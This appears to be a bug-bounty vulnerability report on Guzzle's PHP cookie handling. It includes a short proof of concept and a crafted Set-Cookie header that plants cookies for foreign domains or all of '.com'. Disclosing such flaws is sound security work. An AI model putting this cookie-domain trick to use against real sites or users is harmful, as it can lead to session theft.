Description

It is not checked if the cookie domain equals the domain of the server which sets the cookie via the Set-Cookie header.

Proof of Concept

<?php
require "vendor/autoload.php";
$client = new \GuzzleHttp\Client(["cookies" => true]);
$client->request("GET", "https://<id>.free.beeceptor.com/setcookie");
$cookies = $client->getConfig('cookies')->toArray();
print_r($cookies);
?>

You can use beeceptor to mock the endpoint, just add the following header to the response: "Set-Cookie": "poc=1; Domain=huntr.dev"

Also works with .com as domain, this would send the cookie to all .com domains.

Impact

The vulnerability is capable of stealing sessions if the right conditions are met.